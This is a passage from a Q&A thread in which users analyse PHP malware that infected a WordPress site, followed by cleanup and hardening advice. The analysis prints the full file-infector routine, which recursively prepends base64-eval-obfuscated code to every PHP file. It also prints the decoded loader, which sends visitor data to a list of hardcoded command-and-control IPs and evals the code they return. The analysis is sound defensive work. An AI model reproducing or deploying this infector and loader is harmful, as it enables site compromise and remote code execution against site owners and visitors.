    $coo = str_replace('$v0', $v0, $coo);
    $mas1 = pass_gen(true);
    $coo = str_replace('$mas1', $mas1, $coo);
    $mas2 = pass_gen(true);
    $coo = str_replace('$mas2', $mas2, $coo);
    $mas3 = pass_gen(true);
    $coo = str_replace('$mas3', $mas3, $coo);
    $code1 = rand(1000, 10000);
    $coo = str_replace('$code1', $code1, $coo);
    $code2 = rand(1000, 10000);
    $coo = str_replace('$code2', $code2, $coo);
    $code3 = rand(1000, 10000);
    $coo = str_replace('$code3', $code3, $coo);

    for ($i = 0; $i < 3; $i++) {
        $code = base64_encode($code);
        $code = 'eval(base64_decode("'.$code.'")); ';
    }
    $code = base64_encode($code);


    $z = GetMass('eval', $code1, $mas1);
    $z. = GetMass('create_function', $code2, $mas2);
    $z. = GetMass('base64_decode', $code3, $mas3);
    $z. = $v0.'="'.$code.'";';
    $z. = $coo;
    return $z;

}

function modify($fname) {


    $tmp = file_get_contents($fname);
    $md_start = md5($tmp);

    chmod($fname, 0666);
    $md = md5($fname);



    $pattern = '/function GetMama\(\).*\]\}\)\)\{break;\}\}/i';
    $replacement = '';
    $tmp = preg_replace($pattern, $replacement, $tmp);



    $pattern = '/\/\*god_mode_on.*god_mode_off\*\//i';
    $replacement = '';
    $tmp = preg_replace($pattern, $replacement, $tmp);



    $pattern = '/\/\*'.$md.'_on.*'.$md.'_off\*\//i';
    $replacement = '';
    $tmp = preg_replace($pattern, $replacement, $tmp);



    $pattern = '/<\?php[\s]*\?>/i';
    $replacement = '';
    $tmp = preg_replace($pattern, $replacement, $tmp);



    $pos = strpos($tmp, 'GetMama');
    $pos2 = strpos($tmp, 'god_mode_on');
    if (($pos === false) && ($pos2 === false)) {

        $code_t = 'if (!function_exists("GetMama")){  function mod_con($buf){str_ireplace("<body>","<body>",$buf,$cnt_h);if ($cnt_h == 1) {$buf = str_ireplace("<body>","<body>" . stripslashes($_SERVER["good"]),$buf); return $buf;}str_ireplace("</body>","</body>",$buf,$cnt_h);if ($cnt_h == 1) {$buf = str_ireplace("</body>",stripslashes($_SERVER["good"])."</body>",$buf); return $buf;}return $buf;}function opanki($buf){$gz_e = false;$h_l = headers_list();if (in_array("Content-Encoding: gzip", $h_l)) { $gz_e = true;}if ($gz_e){$tmpfname = tempnam("/tmp", "FOO");file_put_contents($tmpfname, $buf);$zd = gzopen($tmpfname, "r");$contents = gzread($zd, 10000000);$contents = mod_con($contents);gzclose($zd);unlink($tmpfname);$contents = gzencode($contents);} else {$contents = mod_con($buf);}$len = strlen($contents);header("Content-Length: ".$len);return($contents);} function GetMama(){$mother = "###";return $mother;}ob_start("opanki");function ahfudflfzdhfhs($pa){$mama = GetMama();$file = urlencode(__FILE__);if (isset($_SERVER["HTTP_HOST"])){$host = $_SERVER["HTTP_HOST"];} else {$host = "";}if (isset($_SERVER["REMOTE_ADDR"])){$ip = $_SERVER["REMOTE_ADDR"];} else {$ip = "";}if (isset($_SERVER["HTTP_REFERER"])){$ref = urlencode($_SERVER["HTTP_REFERER"]);} else {$ref = "";}if (isset($_SERVER["HTTP_USER_AGENT"])){$ua = urlencode(strtolower($_SERVER["HTTP_USER_AGENT"]));} else {$ua = "";}if (isset($_SERVER["QUERY_STRING"])){$qs = urlencode($_SERVER["QUERY_STRING"]);} else {$qs = "";}$url_0 = "http://" . $pa;$url_1 = "/jedi.php?version=0991&mother=" .$mama . "&file=" . $file . "&host=" . $host . "&ip=" . $ip . "&ref=" . $ref . "&ua=" .$ua . "&qs=" . $qs;$try = true;if( function_exists("curl_init") ){$ch = curl_init($url_0 . $url_1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_TIMEOUT, 3);$ult = trim(curl_exec($ch));$try = false;} if ((ini_get("allow_url_fopen")) && $try) {$ult = trim(@file_get_contents($url_0 . $url_1));$try = false;}if($try){$fp = fsockopen($pa, 80, $errno, $errstr, 30);if ($fp) {$out = "GET $url_1 HTTP/1.0\r\n";$out .= "Host: $pa\r\n";$out .= "Connection: Close\r\n\r\n";fwrite($fp, $out);$ret = "";while (!feof($fp)) {$ret  .=  fgets($fp, 128);}fclose($fp);$ult = trim(substr($ret, strpos($ret, "\r\n\r\n") + 4));}}  if (strpos($ult,"eval") !== false){$z = stripslashes(str_replace("eval","",$ult)); eval($z); exit();}if (strpos($ult,"ebna") !== false){$_SERVER["good"] = str_replace("ebna","",$ult);return true;}else {return false;}}$father2[] = "78.46.173.14";$father2[] = "176.9.218.191";$father2[] = "91.228.154.254";$father2[] = "77.81.241.253";$father2[] = "184.82.117.110";$father2[] = "46.4.202.93";$father2[] = "46.249.58.135";$father2[] = "176.9.241.150";$father2[] = "46.37.169.56";$father2[] = "46.30.41.99";$father2[] = "94.242.255.35";$father2[] = "178.162.129.223";$father2[] = "78.47.184.33";$father2[] = "31.184.234.96";shuffle($father2);foreach($father2 as $ur){if ( ahfudflfzdhfhs($ur) ) { break ;}}}';
        $mama = 'wtf';
        $mama = $_SERVER["HTTP_HOST"];
        $code_t = str_replace('###', $mama, $code_t);
        $code = '<'.'?php ';

        $prob = rand(5, 500);

        for ($i = 0; $i < 700 + $prob; $i++) {
            $code = $code.' ';
        }


        $code_t = Codee($code_t);


        $code = $code.'/*'.$md.'_on*/ '.$code_t.' /*'.$md.'_off*/'.' ?>'.$tmp;

        $f = fopen($fname, "w");
        fputs($f, $code);
        fclose($f);
    }
    chmod($fname, 0644);

}

function dir_num($dir) {
    global $fileslist;
    static $deep = 0;

    $odir = @opendir($dir);

    while (($file = @readdir($odir)) !== FALSE) {
        if ($file == '.' || $file == '..') {
            continue;
        } else {
            echo '. ';
            if (
            get_file_extension($file) == 'php') {
                modify($dir.DIRECTORY_SEPARATOR.$file);
            }
        }

        if (is_dir($dir.DIRECTORY_SEPARATOR.$file)) {
            $deep++;
            dir_num($dir.DIRECTORY_SEPARATOR.$file);
            $deep--;
        }
    }@closedir($odir);
}

Echo 'Wait please...<br>';

$dir = dirname(__FILE__);
dir_num($dir);



echo '<script>window.location.reload();</script>';
exit();
```

in this part the script tries to find other `php` files in the current and in the subdirecories and infects them too.

Comment: @Stewe.. thank you so much for the hard work :) I've shut down my website for time being.. as your analysis shows - all my files are now infected. Have to find a way to clean them up all.. There's just 1 thing I don't understand. How can someone modify my php files without having write access to them? I doubt if my account was broken into because the hosting company says that there were no ftp sessions during the time slot when my account was possibly hacked.

Comment: You're welcome :) Do you have a file upload on your site? Maybe that allows an attacker to upload (php) files? Or simmilar code that takes the user input and writes it to a (php) file? Or some code that uses `eval()` on user input? There are a lot of possibilities. It is hard to tell without looking carefully thru each php source file. -- As long as the files are writeable by the system/webserver php code can modify php files. To avoid that you would have to change the owner of the php files and make them ony readable by the system.

Answer (score 5):

I would say remove all of the snippets like it, change all of your passwords and if possible, take your website offline until support can get back to you. It sure looks like its up to no good, after some digging through the code and decoding, i found this:

```
<?php 

if (!function_exists("GetMama")){
    function mod_con($buf){
        str_ireplace("<body>","<body>",$buf,$cnt_h);if ($cnt_h == 1) {
            $buf = str_ireplace("<body>","<body>" . stripslashes($_SERVER["good"]),$buf); return $buf;
        }str_ireplace("</body>","</body>",$buf,$cnt_h);if ($cnt_h == 1) {
            $buf = str_ireplace("</body>",stripslashes($_SERVER["good"])."</body>",$buf); return $buf;
        }return $buf;
    }function opanki($buf){
        $gz_e = false;$h_l = headers_list();if (in_array("Content-Encoding: gzip", $h_l)) {
            $gz_e = true;
        }if ($gz_e){
            $tmpfname = tempnam("/tmp", "FOO");file_put_contents($tmpfname, $buf);$zd = gzopen($tmpfname, "r");$contents = gzread($zd, 10000000);$contents = mod_con($contents);gzclose($zd);unlink($tmpfname);$contents = gzencode($contents);
        } else {$contents = mod_con($buf);
        }$len = strlen($contents);header("Content-Length: ".$len);return($contents);
    } function GetMama(){
        $mother = "www.99bits.com";return $mother;
    }ob_start("opanki");function ahfudflfzdhfhs($pa){
        $mama = GetMama();$file = urlencode(__FILE__);if (isset($_SERVER["HTTP_HOST"])){
            $host = $_SERVER["HTTP_HOST"];
        } else {$host = "";
        }if (isset($_SERVER["REMOTE_ADDR"])){
            $ip = $_SERVER["REMOTE_ADDR"];
        } else {$ip = "";
        }if (isset($_SERVER["HTTP_REFERER"])){
            $ref = urlencode($_SERVER["HTTP_REFERER"]);
        } else {$ref = "";
        }if (isset($_SERVER["HTTP_USER_AGENT"])){
            $ua = urlencode(strtolower($_SERVER["HTTP_USER_AGENT"]));
        } else {$ua = "";
        }if (isset($_SERVER["QUERY_STRING"])){
            $qs = urlencode($_SERVER["QUERY_STRING"]);
        } else {$qs = "";
        }$url_0 = "http://" . $pa;$url_1 = "/jedi.php?version=0991&mother=" .$mama . "&file=" . $file . "&host=" . $host . "&ip=" . $ip . "&ref=" . $ref . "&ua=" .$ua . "&qs=" . $qs;$try = true;if( function_exists("curl_init") ){
            $ch = curl_init($url_0 . $url_1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_TIMEOUT, 3);$ult = trim(curl_exec($ch));$try = false;
        } if ((ini_get("allow_url_fopen")) && $try) {
            $ult = trim(@file_get_contents($url_0 . $url_1));$try = false;
        }if($try){
            $fp = fsockopen($pa, 80, $errno, $errstr, 30);if ($fp) {
                $out = "GET $url_1 HTTP/1.0\r\n";$out .= "Host: $pa\r\n";$out .= "Connection: Close\r\n\r\n";fwrite($fp, $out);$ret = "";while (!feof($fp)) {
                    $ret  .=  fgets($fp, 128);
                }fclose($fp);$ult = trim(substr($ret, strpos($ret, "\r\n\r\n") + 4));
            }
        }  if (strpos($ult,"eval") !== false){
            $z = stripslashes(str_replace("eval","",$ult)); eval($z); exit();
        }if (strpos($ult,"ebna") !== false){
            $_SERVER["good"] = str_replace("ebna","",$ult);return true;
        }else {return false;
        }
    }$father2[] = "78.46.173.14";$father2[] = "176.9.218.191";$father2[] = "91.228.154.254";$father2[] = "77.81.241.253";$father2[] = "184.82.117.110";$father2[] = "46.4.202.93";$father2[] = "46.249.58.135";$father2[] = "176.9.241.150";$father2[] = "46.37.169.56";$father2[] = "46.30.41.99";$father2[] = "94.242.255.35";$father2[] = "178.162.129.223";$father2[] = "78.47.184.33";$father2[] = "31.184.234.96";shuffle($father2);foreach($father2 as $ur){
        if ( ahfudflfzdhfhs($ur) ) {
            break ;
        }
    }
}
```

Comment: Even if you remove the code today - it may very well be there tomorrow.

Comment: This is a fun one. And it seems to be aimed at www.99bits.com, or is at least calling it mommy. :P

Comment: all it is is many nested `eval(base64_decode(eval(base64_decode(eval(base64_decode())))))` calls

Comment: yep.. www.99bits.com is my website!

Comment: I have decoded first time the var `$cYNv2rhkPEonbobDnRYiA9pfFk4TZ4jFSW1K` with `base64_decode` and stoped

Comment: its in the variable `$cYNv2rhkPEonbobDnRYiA9pfFk4TZ4jFSW1K`

Comment: how come? Ok.. My site is being hacked.. but what do I do now? Shut it down for some time, change hosting ? Its wordpress.. what do I do if there's some vulnerability in there?

Comment: The list of Father IPs contains some interesting ones.

Comment: @Rohan step one is to always keep wordpress up to date. Step two is to always keep your working development codebase separate from the live one (so you can just delete the live one and redeploy.) Step three is to always keep wordpress up to date.

Comment: Important to know, your site has been hacked, but you aren't -really- the target. You are just a middle man. You almost certainly weren't specifically targeted either.

Comment: Thanks for all the help.. I went through the access logs and saw that there were sessions being created for my login continuously from 2:58AM to 3:48AM! Every minute!!

Comment: Ok.. can anyone tell if data was sent/transmitted through my files to elsewhere? Looking at the php code.. I can't figure out what the guy is trying to do!

Comment: @Rohan The hacker can do everything, because the script is just a loader that can load arbitrary code, have a look at my updated answer.

Answer (score 1):

Coming from a security background I'm pretty sure your web server has been hacked. To begin with it is generally a good idea to investigate the source, to prevent making that mistake from occurring again.

To begin with:

- Find the first files infected via the time stamps.
- Log active running scripts to determine what is causing this or errors in your PHP logs, etc.

If you're on a shared hosting there isn't much you can do, shared hosting users are generally more vulnerable to getting cracked but if you're on a VPS or better you can contact your host in case of a managed hosting for a complete format or necessary security fixed.

However, the thing is that removing those snippets will 99.99% of the time have no use, it won't prevent the cracker in the future. Changing passwords helps, but again it is not a solid solution.

If you have the resources, hire a security professional to do a quick audit. There are many that ask for payment only if they find a weakness.
If not, then re-evaluate potential weak points in your server. Refer to this one for Linux Servers (http://www.thegeekstuff.com/2011/03/apache-hardening) Incase you're using Windows, let me know I'll link you to a few for windows IIS as well.

Glad I could help!

Comment: Thanks for all the help.. I went through the access logs and saw that there were sessions being created for my login continuously from 2:58AM to 3:48AM! Every minute!!

Answer (score 0):

It appears to be a php type shell script that is injected into your site.  It could be a vulnerability by the web hosting company or your personal web app allowing the hack to occur.